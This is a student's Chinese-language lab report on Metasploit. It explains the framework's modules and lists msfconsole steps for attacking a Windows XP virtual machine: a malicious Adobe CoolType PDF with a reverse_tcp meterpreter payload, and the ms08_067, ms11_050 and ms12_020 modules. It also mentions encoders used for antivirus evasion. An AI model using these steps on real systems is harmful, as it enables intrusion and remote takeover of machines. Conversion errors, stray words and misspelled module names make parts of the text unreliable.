經過此次MSF基礎應用的實驗。我對MSF裏面包括的6個模塊都有了必定的認識,先是exploit模塊,也就是咱們說的滲透模塊,包括主動滲透和被動滲透,老師在課上也生動的講述了區別,我就不贅述了。exploit起運輸的做用,將數據傳輸到對方主機。 post模塊指的是在meterpreter中的那些具體操做,好比抓屏,抓鍵什麼的。而後是payload模塊,payload其實就是指裝載的「具體內容」。就至關於shellcode同樣。若是exploit至關於運載火箭,那麼Payload就至關於要投放的彈頭。payload有三個子目錄,分別是single(獨立),stager(傳輸器),stage(傳輸體)。encoder對須要傳輸的文件進行編碼,使其達到免殺效果,還能消除像「0x00」這種壞字符;nop是空指令(0x90),在「滑翔區」中有重要的應用。最後一個是Auxiliary輔助模塊,這是用來蒐集情報的,每個模塊都是一個源代碼。咱們能夠在usr/share/metasploit—framework/modules/中查看每一個模塊。html
操做起來,其實就是一個套路,先肯定攻擊模塊,使用模塊的命令是use,
而後設置攻擊載荷set payloads,再是
在每一步的時候都要確認參數,使用show options
命令觀察,show targets能夠查看能被攻擊的操做系統等等。這裏就不贅述了。但具體操做起來,就是會有各類問題,好比瀏覽器的版本問題,xp虛擬機的版本問題,任何一個小問題,都會讓咱們的實驗結果不理想。不過還好,最後都一一克服了。也許這就是實驗的魅力吧,老師故意給咱們設置不少障礙,而後讓咱們本身想辦法去跨越障礙,最後到達勝利的終點。重要的不是結果,重要的而是實驗的這個過程,這個過程才能真正的讓咱們學到東西。不要輕言放棄,要激流勇進,克服一個個困難老是有成就感的!shell
兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3。windows
設置虛擬機網絡爲NAT模式,保證兩臺虛擬機能夠ping通。api
kali下打開顯示隱藏文件。瀏覽器
在kali終端中開啓msfconsole。安全
輸入命令use exploit/windows/fileformat/adobecooltypesing,進入該漏洞模塊的使用。網絡
使用命令set payload windows/meterpreter/reverse_tcp設置攻擊有效載荷。session
輸入命令show options顯示咱們須要在攻擊前須要設置的數據。tcp
set FILENAME xxx.pdfpost
set LHOST "KALI 的 Ip"
set LPORT xxxx
輸入exploit,生成pdf文件,能夠看到pdf所在文件夾,將pdf複製到靶機裏。
使用命令back退出當前模塊,並使用use exploit/multi/handler新建一個監聽模塊。具體過程不贅述。
使用命令exploit開始攻擊,在xp中打開pdf。這裏pdf比較難打開。咱們能夠選擇在kali中等結果。
兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3(英文版)。
在VMware中設置兩臺虛擬機網絡爲NAT模式,自動分配IP地址,以後兩臺虛擬機就能夠直接ping通。
最開始ping了半天,ping不通,後來發現是ip地址不在同一個網段上,須要從新設置xp的ip地址。具體過程不贅述,地球人都會。由於這裏是c類地址,因此前三位同樣。個人kali ip是192.168.124.130,xp ip設置爲:192.168.124.128。
在kali終端中開啓msfconsole。
而後輸入命令search ms08_067,會顯示出找到的滲透模塊。
輸入命令use exploit/windows/smb/ms08067netapi,進入該漏洞模塊的使用。
再輸入命令show payload會顯示出有效的攻擊載荷。
set LHOST "kali Ip"
set RHOST "Win xp Ip"
兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp2/3。
設置虛擬機網絡爲NAT模式,保證兩臺虛擬機能夠相互間ping通(關閉靶機防火牆)。
兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3(包含IE7)。
設置虛擬機網絡爲NAT模式,保證兩臺虛擬機能夠相互間ping通(關閉靶機防火牆)。
輸入命令use windows/browser/ms11050mshtml_cobjectelement,進入該漏洞模塊。
輸入info查看信息:
遠程桌面協議(端口號:3389)
Windows在處理某些對象時存在錯誤,可經過特製的RDP報文訪問未初始化的或已經刪除的對象,致使任意代碼執行,而後控制系統。
serch ms-12-020
設置RHOST
exploit